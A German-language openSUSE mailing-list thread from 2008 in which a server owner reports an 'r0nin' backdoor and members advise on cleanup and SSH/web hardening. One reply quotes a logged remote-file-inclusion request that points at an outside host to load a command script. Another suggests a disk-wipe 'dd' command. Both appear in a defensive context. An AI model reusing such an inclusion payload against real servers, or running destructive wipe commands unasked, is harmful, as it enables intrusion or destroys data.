Hallo zusammen, so wie es aussieht, habe ich mir auf meinem Root-Server eine Backdoor eingefangen (r0nin). Hierbei werden Dateien (zwei tgz-Files, ein Perl-Skript, das Executable r0nin und ein telnet-Programm) nach /tmp und /var/tmp kopiert. Außerdem läuft ein Prozess r0nin unter dem Benutzer sdb. Meine Fragen: - Auf welchem Weg kann man sich sowas einfangen? Gibt es in irgendwelchen Programm Schwachstellen, die das ermöglichen? - Wie werden ich das wieder los? Einfach nur die Dateien löschen und den Prozess killen hilft nichts. Spätestens nach einem Tag ist alles wieder da. Viele Grüße, Ralf. -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
Ralf Schneider schrieb:
Hallo zusammen,
so wie es aussieht, habe ich mir auf meinem Root-Server eine Backdoor eingefangen (r0nin). Hierbei werden Dateien (zwei tgz-Files, ein Perl-Skript, das Executable r0nin und ein telnet-Programm) nach /tmp und /var/tmp kopiert. Außerdem läuft ein Prozess r0nin unter dem Benutzer sdb.
Meine Fragen: - Auf welchem Weg kann man sich sowas einfangen? Gibt es in irgendwelchen Programm Schwachstellen, die das ermöglichen? - Wie werden ich das wieder los? Einfach nur die Dateien löschen und den Prozess killen hilft nichts. Spätestens nach einem Tag ist alles wieder da.
1) Rechner vom Netz nehmen 2) Per Boot CD ein Image für die Analyse machen 3) Rechner komplett formatieren und komplett neu aufsetzten Keine Übernahme von Dateien aus dem Altsystem die du nicht 100%ig prüfen kannst. Wie das passieren kann: Ohne weitere Infos zum System kann dir da keiner eine Auskunft geben. -- i.A. Ralf Prengel Customer Care Manager Comline AG Hauert 8 D-44227 Dortmund/Germany Fon +49231 97575- 904 Fax +49231 97575- 905 EMail ralf.prengel@comline.de www.comline.de Vorstand Stephan Schilling,Erwin Leonhardi Aufsichtsrat Dr. Franz Schoser (Vorsitzender) HR Dortmund B 14570 USt.-ID-Nr. DE 124727422 -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
On Fri, Jan 18, 2008 at 10:38:18AM +0100, Ralf Prengel wrote:
1) Rechner vom Netz nehmen 2) Per Boot CD ein Image für die Analyse machen 3) Rechner komplett formatieren und komplett neu aufsetzten Keine Übernahme von Dateien aus dem Altsystem die du nicht 100%ig prüfen kannst.
Genau. Und nach dem neu aufsetzen aide installieren und die Datenbank auf eine CD-RW brennen. -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
Hi, 18.01.2008 10:29, Ralf Schneider wrote:
Hallo zusammen,
so wie es aussieht, habe ich mir auf meinem Root-Server eine Backdoor eingefangen (r0nin). Hierbei werden Dateien (zwei tgz-Files, ein Perl-Skript, das Executable r0nin und ein telnet-Programm) nach /tmp und /var/tmp kopiert. Außerdem läuft ein Prozess r0nin unter dem Benutzer sdb.
Meine Fragen: - Auf welchem Weg kann man sich sowas einfangen? Gibt es in irgendwelchen Programm Schwachstellen, die das ermöglichen?
Ja. Wenn es nun jemanden gäbe der dir genau sagen kann welche Schwachstellen in welchen Programmen sind wäre das eine sehr gefragte Person...
- Wie werden ich das wieder los? Einfach nur die Dateien löschen und den Prozess killen hilft nichts. Spätestens nach einem Tag ist alles wieder da.
dd if=/dev/zero of/dev/sda warten Backup einspielen vorher sicherstellen dass das Rootkit nicht schon im Backup ist, ggf. nur Daten daraus zurückspielen, und den Rest des Systems neu aufsetzen. Im übrigen gibt es bei meinem alten Freund Google einge Hinweise zu r0nin. Aber da würde ich an deiner STelle erst weiterlesen nachdem dein Rechner vom Netz ist... Arno
Viele Grüße, Ralf.
-- Arno Lehmann IT-Service Lehmann www.its-lehmann.de -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
On Fri, 18 Jan 2008 10:29:34 +0100, Ralf Schneider <ml@tapfere-schneiderleins.de> wrote:
Hallo zusammen,
so wie es aussieht, habe ich mir auf meinem Root-Server eine Backdoor eingefangen (r0nin). Hierbei werden Dateien (zwei tgz-Files, ein Perl-Skript, das Executable r0nin und ein telnet-Programm) nach /tmp und /var/tmp kopiert. Außerdem läuft ein Prozess r0nin unter dem Benutzer sdb.
Meine Fragen: - Auf welchem Weg kann man sich sowas einfangen? Gibt es in irgendwelchen Programm Schwachstellen, die das ermöglichen? - Wie werden ich das wieder los? Einfach nur die Dateien löschen und den Prozess killen hilft nichts. Spätestens nach einem Tag ist alles wieder da.
Beliebte Einfallstore sind unsichere PHP-Skripte, z.B. Content-Management-Systeme, Gästebücher, Formulare. Wir hatten mal eine Lücke in Joomla (facileforms, falls sich jemand erinnert), durch die uns ein Angreifer sein Zeugs installiert hat. Zum Glück zwar nicht mit Root-Rechten, aber es war auch so schon schlimm genug. Du müsstest die gesamte Software auf den neuesten Stand bringen und weiterhin dafür sorgen, dass nur die Dienste nach außen angeboten werden, die auch wirklich nötig sind. Wenn du die Domain z.B. nur für Email benutzt, kannst du den Webserver abschalten = ein Einfallstor weniger. Was nicht da ist, kann nicht missbraucht werden. Auch wichtig: Root-Login in der SSH-Konfiguration unterbinden, Anmelden nur mit Keys erlauben. Allerweltspasswörter beim Root-Account sind ebenfalls ein Einfallstor für Brute-Force-Angriffe. Weitere Informationen zur Serversicherheit gibt es z.B. hier: http://www.rootforum.de/forum/ Auf jeden Fall musst du den Server vom Netz nehmen und neu aufsetzen. Da der Eindringling Root-Rechte hat, könnte dein Server inzwischen schon zu allen möglichen unerfreulichen Dingen benutzt werden, die ein geschickter Angreifer außerdem vor dir verbergen könnte. Massenhafter Versand von Spam-Mails, Denial-of-Service-Angriffe auf kommerzielle Websites samt Erpressung, nicht zuletzt auch Filesharing und natürlich die Verbreitung von Kinderpornos kämen da infrage. Dies sind die häufigsten Motive, warum die Virenhersteller Botnetze aufbauen und vermieten, und in einem Botnetz aus privaten PCs ist ein gahackter Rootserver so was wie ein kleiner Hauptgewinn. Da es dein Server ist, hältst du auch erst mal den Kopf für alles hin, was die Maschine macht, und damit ist nicht zu spaßen (auch strafrechtlich). Jürgen -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
On Fri, 18 Jan 2008 11:21:03 +0100, Juergen Langowski <jlangowski@gmx.de> wrote:
Da der Eindringling Root-Rechte hat, könnte dein Server inzwischen schon zu allen möglichen unerfreulichen Dingen benutzt werden, die ein geschickter Angreifer außerdem vor dir verbergen könnte.
Korrektur: Er braucht nicht einmal Root-Rechte zu haben, um die erwähnten unerfreulichen Dinge anzustellen, aber falls er Root-Rechte hat, kann er das dann auch noch vor dir verbergen und die Logfiles verändern usw. Hab's etwas zu eilig abgeschickt, sorry. Jürgen -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
Am Freitag, 18. Januar 2008 11:21:03 schrieb Juergen Langowski:
On Fri, 18 Jan 2008 10:29:34 +0100, Ralf Schneider
<ml@tapfere-schneiderleins.de> wrote:
Hallo zusammen,
so wie es aussieht, habe ich mir auf meinem Root-Server eine Backdoor eingefangen (r0nin). Hierbei werden Dateien (zwei tgz-Files, ein Perl-Skript, das Executable r0nin und ein telnet-Programm) nach /tmp und /var/tmp kopiert. Außerdem läuft ein Prozess r0nin unter dem Benutzer sdb.
Meine Fragen: - Auf welchem Weg kann man sich sowas einfangen? Gibt es in irgendwelchen Programm Schwachstellen, die das ermöglichen? - Wie werden ich das wieder los? Einfach nur die Dateien löschen und den Prozess killen hilft nichts. Spätestens nach einem Tag ist alles wieder da.
Beliebte Einfallstore sind unsichere PHP-Skripte, z.B. Content-Management-Systeme, Gästebücher, Formulare.
Im Log bei mir ist haufenweise sowas zu finden /intern/modules/addons/plugin.php?doc_root=http://charitygrants.org/images/cmd.txt? Ist das ein Versuch solch ein Backdoor zu installieren? Bye Michael -- Es gibt drei Möglichkeiten, eine Firma zu ruinieren: mit Frauen, das ist das Angenehmste; mit Spielen, das ist das Schnellste; mit Computern, das ist das Sicherste. -- Oswald Dreyer-Eimbcke _____________________________________________________________________________ http://macbyte.info/ Mobile Loadavg.: 0.90 0.76 0.83 http://dattuxi.de/ Registered Linux User #228306 Linux 2.6.22-14-x86_64 ICQ #151172379 -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
On Fri, 18 Jan 2008 11:40:22 +0100, Michael Raab <ml-lists@macbyte.info> wrote:
Am Freitag, 18. Januar 2008 11:21:03 schrieb Juergen Langowski:
On Fri, 18 Jan 2008 10:29:34 +0100, Ralf Schneider
(...)
Beliebte Einfallstore sind unsichere PHP-Skripte, z.B. Content-Management-Systeme, Gästebücher, Formulare.
Im Log bei mir ist haufenweise sowas zu finden /intern/modules/addons/plugin.php?doc_root=http://charitygrants.org/images/cmd.txt?
Ist das ein Versuch solch ein Backdoor zu installieren?
Es gibt automatisierte Skripte, die Server auf Lücken abklopfen und z.B. nach Standard-Installationspfaden (und nach Lücken) von myPHPAdmin usw. suchen. Dazu wird auch gern mal ein bereits gekaperter Rootserver benutzt, der dann seinerseits rund um die Uhr nach anfälligen Kollegen sucht. Für sich genommen sind diese Aufrufe noch nicht schlimm, solange die Skripte sicher sind. Unterbinden kann man sie sowieso nicht, denn sobald ein Webserver im Netz "sichtbar" wird, ist er solchen Testbohrungen ausgesetzt. Das gehört zum Grundrauschen. Bei MyPHPAdmin und anderswo sollte man die Sicherheitshinweise beachten (mit Passwort absichern usw.), und wenn man die Installation in ein selbst definiertes Verzeichnis vornimmt, statt der Standardvorgabe zu folgen, bremst man schon mal die automatisierten Skripte aus. Letzteres trägt nicht wesentlich zur Sicherheit bei, entfernt aber schon mal ein Menge Gerümpel aus den Logfiles. Gleiches gilt für das SSH-Login. Aus Sicherheitsgründen lassen wir nur noch Login mit Key für einen normalen Benutzer zu (nicht root) und haben außerdem den Port verlegt, was die meisten automatisierten Skripte ins Leere laufen lässt und die Logfiles erheblich übersichtlicher macht. Jürgen -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
On Freitag, 18. Januar 2008, Juergen Langowski wrote:
Gleiches gilt für das SSH-Login. Aus Sicherheitsgründen lassen wir nur noch Login mit Key für einen normalen Benutzer zu (nicht root) und haben außerdem den Port verlegt, was die meisten automatisierten Skripte ins Leere laufen lässt und die Logfiles erheblich übersichtlicher macht.
Es sollte zur Vollständigkeit aber auch erwähnt werden, dass aus manchen Netzen die restiriktiveren Firewallregeln unterliegen ein Zugriff auf einen anderen als Port 22 nicht erlaubt sein könnte. Bevor man sich also selber von seinem Server aussperrt lieber vorher schlau machen. Das war auch der Grund warum ich den Port von meinem SSH-Server wieder zurück auf 22 legen musste. MfG Marco
Am Freitag, 18. Januar 2008 12:41:43 schrieb Marco Roeben:
On Freitag, 18. Januar 2008, Juergen Langowski wrote:
Gleiches gilt für das SSH-Login. Aus Sicherheitsgründen lassen wir nur noch Login mit Key für einen normalen Benutzer zu (nicht root) und haben außerdem den Port verlegt, was die meisten automatisierten Skripte ins Leere laufen lässt und die Logfiles erheblich übersichtlicher macht.
Es sollte zur Vollständigkeit aber auch erwähnt werden, dass aus manchen Netzen die restiriktiveren Firewallregeln unterliegen ein Zugriff auf einen anderen als Port 22 nicht erlaubt sein könnte. Bevor man sich also selber von seinem Server aussperrt lieber vorher schlau machen. Das war auch der Grund warum ich den Port von meinem SSH-Server wieder zurück auf 22 legen musste.
Ich habe in meinem heimischen Netzwerk SSH an der Hardwarefirewall Dicht gemacht. Wenn ich denn mal via SSH mit meinem Serverpark Kontakt aufnehmen muss, verbinde ich mit meinem Schleppi via VPN mit der Heimat, wo dann wieder SSH möglich ist. Denn diese automatisierten Zugriffe sprengten hier fast die Festplatten. 20 - 30 Tausend Zugriffe pro Tag waren keine Seltenheit. Bye Michael -- He who wishes to secure the good of others has already secured his own. -- Confucius _____________________________________________________________________________ http://macbyte.info/ Mobile Loadavg.: 0.44 0.94 1.14 http://dattuxi.de/ Registered Linux User #228306 Linux 2.6.22-14-x86_64 ICQ #151172379 -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
Hallo, Am Freitag, den 18.01.2008, 14:19 +0100 schrieb Michael Raab:
Am Freitag, 18. Januar 2008 12:41:43 schrieb Marco Roeben:
On Freitag, 18. Januar 2008, Juergen Langowski wrote:
Gleiches gilt für das SSH-Login. Aus Sicherheitsgründen lassen wir nur noch Login mit Key für einen normalen Benutzer zu (nicht root) und haben außerdem den Port verlegt, was die meisten automatisierten Skripte ins Leere laufen lässt und die Logfiles erheblich übersichtlicher macht.
Es sollte zur Vollständigkeit aber auch erwähnt werden, dass aus manchen Netzen die restiriktiveren Firewallregeln unterliegen ein Zugriff auf einen anderen als Port 22 nicht erlaubt sein könnte. Bevor man sich also selber von seinem Server aussperrt lieber vorher schlau machen. Das war auch der Grund warum ich den Port von meinem SSH-Server wieder zurück auf 22 legen musste.
Ich habe in meinem heimischen Netzwerk SSH an der Hardwarefirewall Dicht gemacht. Wenn ich denn mal via SSH mit meinem Serverpark Kontakt aufnehmen muss, verbinde ich mit meinem Schleppi via VPN mit der Heimat, wo dann wieder SSH möglich ist. Denn diese automatisierten Zugriffe sprengten hier fast die Festplatten. 20 - 30 Tausend Zugriffe pro Tag waren keine Seltenheit.
Ich verwende auf meinen Servern das Tool denyhosts - bei Debian Etch und Ubuntu seit 6.06 standardmäßig Bestandteil der Distribution - um die unerwünschten Kontaktaufnahmen auszusperren. Nach einer einstellbaren Anzahl von Kontaktversuchen, werden weitere Versuche abgewiesen. Hat sich für mich als sehr wirksam gezeigt. Dann gibt's auch noch Tools zur umgehenden Entdeckung neuer oder veränderter Binaries in vorgewählten Verzeichnissen (Standard: /bin, /sbin und /usr/bin bzw. /usr/sbin) durch ebenfalls einstellbar regelmäßigen (täglichen/stündlichen) Abgleich der Checksum mit den gespeicherten Sollwerten des nicht infizierten Systems. Man muss nur daran denken, nach dem Einspielen von Patches die Datenbank neu zu initalisieren, um Fehlalarme zu vermeiden ;-) Äußerst wichtig sicher auch die lange von vielen Providern nicht angebotenen Firewall-Funktionen, die alle Ports dicht machen, die nicht unbedingt gebraucht werden. Herzlicher Gruß Dr. Reiner Pietrzak <suse@crasswerk.de> Abonnierte SuSE Mailinglisten -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
On Freitag, 18. Januar 2008, Dr. Reiner Pietrzak wrote:
Ich verwende auf meinen Servern das Tool denyhosts - bei Debian Etch und Ubuntu seit 6.06 standardmäßig Bestandteil der Distribution - um die unerwünschten Kontaktaufnahmen auszusperren. Nach einer einstellbaren Anzahl von Kontaktversuchen, werden weitere Versuche abgewiesen. Hat sich für mich als sehr wirksam gezeigt.
Hört sich sehr gut an. Ich werd mal nen Blick auf die Tool s werfen ob das was für mich ist. Man lernt nie aus auf dieser Liste. :-) MfG Marco
Am 18.01.08 schrieb Marco Roeben <roeben@fmp-berlin.de>:
Hört sich sehr gut an. Ich werd mal nen Blick auf die Tool s werfen ob das was für mich ist. Man lernt nie aus auf dieser Liste. :-)
Sieh Dir auch fail2ban an. Achja: http://www.de.debian.org/doc/manuals/securing-debian-howto/ Umlegen des ssh-Ports ist Security by Obscurity. Gruß Martin -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
On Fri, Jan 18, 2008 at 04:41:02PM +0100, Dr. Reiner Pietrzak wrote:
Ich verwende auf meinen Servern das Tool denyhosts - bei Debian Etch und Ubuntu seit 6.06 standardmäßig Bestandteil der Distribution
Ein PasswordAuthentication no UsePAM no in sshd_config macht denyhosts unnoetig. Wer Authentifizierung via ssh mittels Passwort erlaubt, ist selber schuld :-) -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
Ralf Schneider wrote:
Hallo zusammen,
so wie es aussieht, habe ich mir auf meinem Root-Server eine Backdoor eingefangen (r0nin). Hierbei werden Dateien (zwei tgz-Files, ein Perl-Skript, das Executable r0nin und ein telnet-Programm) nach /tmp und /var/tmp kopiert. Außerdem läuft ein Prozess r0nin unter dem Benutzer sdb.
Meine Fragen: - Auf welchem Weg kann man sich sowas einfangen? Gibt es in irgendwelchen Programm Schwachstellen, die das ermöglichen?
Die Ablage unter /tmp und /var/tmp deutet darauf hin, dass die Dateien über ein ausnutzbares Verhalten beim Anlegen von temporären Dateien auf den Rechner kamen. Der erste Kandidat dafür ist meistens Apache und unsichere Scripte.
- Wie werden ich das wieder los? Einfach nur die Dateien löschen und den Prozess killen hilft nichts. Spätestens nach einem Tag ist alles wieder da.
Greppe mal deine Logs nach den Dateien aus /tmp und schau nach, von welchem User/programm/script die Dateien dort angelegt wurden. Nachdem du den Rechner vom Netz geklemmt hast. (^-^) Danach nimm dir als Regel, das grundsätzlich der Zugriff vom Internet aus nur dann gestattet ist auf eine Resource, wenn er per Regel ausdrücklich erlaubt wurde. Das ist mühselig am Anfang, aber entspannend im Betrieb. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org
participants (10)
-
Arno Lehmann -
Dr. Reiner Pietrzak -
Heinz Diehl -
Juergen Langowski -
Marco Roeben -
Martin Schröder -
Michael Raab -
Ralf Prengel -
Ralf Schneider -
Sandy Drobic